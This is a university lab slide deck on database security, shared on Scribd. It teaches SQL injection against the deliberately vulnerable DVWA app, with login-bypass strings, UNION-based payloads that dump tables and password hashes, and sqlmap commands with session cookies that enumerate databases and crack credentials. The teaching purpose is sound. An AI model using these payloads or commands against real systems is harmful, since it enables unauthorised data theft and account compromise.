Scribd
Upload
21 views

LAB - Chapter 9 - Database Security

Uploaded by

Trần Như Thiện
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
21 views

LAB - Chapter 9 - Database Security

Uploaded by

Trần Như Thiện
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 9

15/10/2024

 

Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE

 SQL Injection attacks


o Example
 Damn Vulnerable Web App – DVWA
o Examples
 Sqlmap
o Examples

15/10/2024 2

1
15/10/2024

 SQL Injections can do more harm than just by passing


the login algorithms. Some of the attacks include
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and
install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email, and
passwords to the attacker’s remote server
o Getting user login details etc

15/10/2024 3

 Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password‘

o Type:
$username = 1' or '1' = '1$password = 1' or '1' = '1

o The query will be:


SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
 => always true (OR 1=1) => the system has authenticated the user
without knowing the username and password.

15/10/2024 4

2
15/10/2024

 SQL query:
SELECT * FROM products WHERE id_product=$id_product
ex:
http://www.example.com/product.php?id=10

 Using the operators AND and OR.


SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> there is no content available or a blank page.

 Then, send a true statement and check if there is a valid result:


Ex: http://www.example.com/product.php?id=10 AND 1=1

15/10/2024 5

 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web


application that is damn vulnerable. Its main goals are to be an aid for
security professionals to test
 1.1 Download DVWA
 1.2 Create database and user in DVWA
 1.3 Config DVWA
 1.4 Setup basic database in DVWA
 1.5 Access DVWA
http://10.0.0.2/login.php
 Set DVWA Security Level: Low, Medium, High
o SQL Injection
o SQL Injection (Blind)

15/10/2024 6

3
15/10/2024

15/10/2024 7

15/10/2024 8

4
15/10/2024

 Basic Injection: 1
 Always True Scenario: %' or '0'='0
 Display Database Version :
o %' or 0=0 union select null, version() #
 Display Database User:
o %' or 0=0 union select null, user() #
 Display Database Name
o %' or 0=0 union select null, database() #
 Display all tables in information_schema
o %' and 1=0 union select null, table_name from
information_schema.tables #

15/10/2024 9

 Display all the user tables in information_schema


o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
 Display all the columns fields in the information_schema
user table
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
 Display all the columns field contents in the
information_schema user table
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #

15/10/2024 10

5
15/10/2024

 Get important information in DVWA database: user/pass


with different level:
o Low
o Medium
o High

15/10/2024 11

 sqlmap is an open source penetration testing tool that


automates the process of
o detecting and exploiting SQL injection flaws
o taking over of database servers.
 It comes with a kick-ass detection engine
 Many niche features
o the ultimate penetration tester
o a broad range of switches lasting from database fingerprinting,
o over data fetching from the database,
o to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
 Download and install Sqlmap
http://sqlmap.sourceforge.net/doc/README.html#s1
15/10/2024 12

6
15/10/2024

 Open firefox: add Tamper Data to Tool


o Select Tool\Tamper Data
o Start Tamper Data
 Or: using F12 to open
 Ex, Show in DVWA:

15/10/2024 13

 Run SQL injection


 Prepare: Tamper with request
o Copying the Referer URL (Ref)
Ex: “http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”
o Copying the Cookie Information (Coo)
Ex: “PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
set security=low”
 Run sqlmap to obtain the following pieces of information
o Obtain Database User For DVWA. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -b --current-db --current-user
o Ex: ./sqlmap.py -u
"http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --
cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b
--current-db --current-user
Do you want to keep testing? Y => Result
15/10/2024 14

7
15/10/2024

 Run sqlmap
o Obtain Database Management Username and Password. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> --string="Surname" --users
--password
Use Dictionary Attack? Y
Dictionary Location? <Press Enter>
o Obtain db_hacker Database Privileges. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> -U db_hacker –privileges
o Obtain a list of all databases.
./sqlmap.py –u <ref> --cookie=<Coo> --dbs
o Obtain "dvwa" tables and contents
./sqlmap.py –u <ref> --cookie=<Coo> -D dvwa --tables
o Obtain columns for table dvwa.users
./sqlmap.py –u <ref> -- cookie=<Coo> -D dvwa -T users --columns15

 Run sqlmap
o Obtain Users and their Passwords from table dvwa.users. Syntax:
./sqlmap.py –u <ref> --cookie=<Coo> -D dvwa -T users -C
user,password --dump
Do you want to use the LIKE operator? Y
Recognize possible HASH values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? y

16

8
15/10/2024

 use sqlmap to obtain the following pieces of information:


o A list of Database Management Usernames and Passwords.
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table.

15/10/2024 17

1. DVWA: SQL Injection, SQL Injection Blind (2)


o Get important information in DVWA database such as: tables,
user/pass with different level: Low, Medium, High
2. Sqlmap: (2)
o Get important information in DVWA database: tables, user/pass
with different level: Low, Medium, High
o Database from other website, ex:
• http://testphp.vulnweb.com
3. Other Tools: (1)
o Hackbar (built-in web browser) -> vulnerable website.

15/10/2024 18

You might also like